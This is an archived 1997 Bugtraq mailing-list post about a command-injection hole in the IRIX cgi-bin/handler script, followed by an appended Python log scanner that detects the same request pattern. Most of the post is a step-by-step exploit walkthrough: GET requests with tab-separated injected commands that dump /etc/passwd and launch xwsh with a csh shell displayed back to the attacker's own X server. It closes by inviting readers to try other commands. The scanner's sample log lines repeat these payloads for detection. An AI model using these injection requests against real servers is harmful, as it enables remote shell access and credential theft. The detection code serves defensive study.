Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: balu () STUDST FH-MUENSTER DE (Thomas Walter)
Date: Thu, 24 Jul 1997 17:51:56 +0200
Hiho... [Corinne Posse Relaeses wrote]
> Quite a while ago, Razvan Dragomirescu (drazvan () kappa ro) released a report on the default cgi-handler scripts that ship with IRIX systems with web servers, and some other web server programs. Just like with the phf bug, with the cgi-handler bug a malicious user could start an xterm from the server machine on their own system.
>
> Example:
>
>     telnet www.highly.respectable.bank.com 80
>     Trying 300.300.300.1...
>     Connected to www.highly.respectable.bank.com
>     Escape character is '^]'.
>     GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
>
> Please note the format of the "GET" query. The above assumes xwsh is in the PATH somewhere, and the "space" between "xwsh" and "-display" should be a TAB.
I've got some problems while trying that...

First it seems that the xwsh was not in the path, so I tried to call xwsh with a given path (note that all whitespaces after GET /cgi-bin/handler/ must be Tabs...):

    enemy% telnet victim 80
    Trying 1.2.3.4...
    Connected to victim.
    Escape character is '^]'.
    GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
    UX:sh (sh): ERROR:
    Connection closed by foreign host.
    enemy%

That opened the xwsh window... But there was only one error-message in the first line:

    /usr/sbin/xwsh: Permission denied: can't start command

Hm - What could that be? Doesn't matter - Let's see what I can do with other commands... (Remember the tabs...)

    enemy% telnet victim 80
    Trying 1.2.3.4...
    Connected to victim.
    Escape character is '^]'.
    GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
    UX:sh (sh): ERROR:
    root:x:0:0:Super-User:/:/bin/csh
    sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
    [... I won't give you that ;) ...]
    nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
    [... and again some more ...]
    Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Let's see if I can get the shadow... [As above] - Didn't work.

So it seems that the WWW server was not running as root (what a pity ;). If it does not run as root - it usually runs as nobody. And what can we see above? Nobody got the shell /dev/null - that's why my xwsh was not able to start a command.

Next try was to give xwsh the command that it should start... (And again: Tabs! - and of course everything in one line...)

    enemy% telnet victim 80
    Trying 1.2.3.4...
    Connected to victim.
    Escape character is '^]'.
    GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download
    UX:sh (sh): ERROR:
    Connection closed by foreign host.
    enemy%

And voila! - What else do you want? Any other programs to start? Just try...
Brgds
Balu

--
Please note: english is not my mother tongue
E-Mail: balu () studst fh-muenster de
Snail Mail: Thomas Walter, Wemhoefer Stiege 10a, 48565 Burgsteinfurt
or Broxtermannstr. 12, 49082 Osnabrueck, GERMANY
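A defender-side check for the request pattern this thread describes, added here as an example and not part of the original post: it scans access-log lines (Common Log Format is an assumption; the sample lines are constructed) and flags requests to /cgi-bin/handler/ whose file argument carries shell separators or whitespace, which is exactly what both xwsh variants above depend on.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (not from the original post).
# Lines 3 and 4 mimic the requests discussed in the thread; note the tab (%09), ';' and '|'.
SAMPLE_LOG = """\
1.2.3.4 - - [24/Jul/1997:17:51:56 +0200] "GET /index.html HTTP/1.0" 200 1024
1.2.3.4 - - [24/Jul/1997:17:52:10 +0200] "GET /cgi-bin/handler/report.txt?data=Download HTTP/1.0" 200 512
1.2.3.4 - - [24/Jul/1997:17:53:01 +0200] "GET /cgi-bin/handler/%09;/usr/sbin/xwsh%09-display%09enemy:0|?data=Download" 200 0
1.2.3.4 - - [24/Jul/1997:17:54:30 +0200] "GET /cgi-bin/handler/;cat%20/etc/passwd|?data=Download" 200 2048
"""

HANDLER_PREFIX = "/cgi-bin/handler/"
# Shell separators and whitespace have no place in a filename handed to the handler script.
SHELL_META = re.compile(r"[;|&`$\t\n ]")
# The request target runs from the method to the closing quote; tabs can appear literally
# in the target (they are not request-line delimiters), so only a space or '"' ends it.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^" ]+)')


def flag_handler_abuse(line):
    """Return the suspicious handler argument, or None if the line looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode %09 / %20 etc. so encoded tabs and spaces are caught as well as literal ones.
    path = unquote(m.group("target")).split("?", 1)[0]
    if not path.startswith(HANDLER_PREFIX):
        return None
    arg = path[len(HANDLER_PREFIX):]
    return arg if SHELL_META.search(arg) else None


def scan(log_text):
    """Return (line_number, handler_argument) for every flagged log line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        arg = flag_handler_abuse(line)
        if arg is not None:
            hits.append((n, arg))
    return hits


if __name__ == "__main__":
    for n, arg in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious handler argument {arg!r}")
```

The same check doubles as an input filter: a handler script that rejects any argument matching SHELL_META before passing it to a shell closes the hole regardless of which account the server runs as.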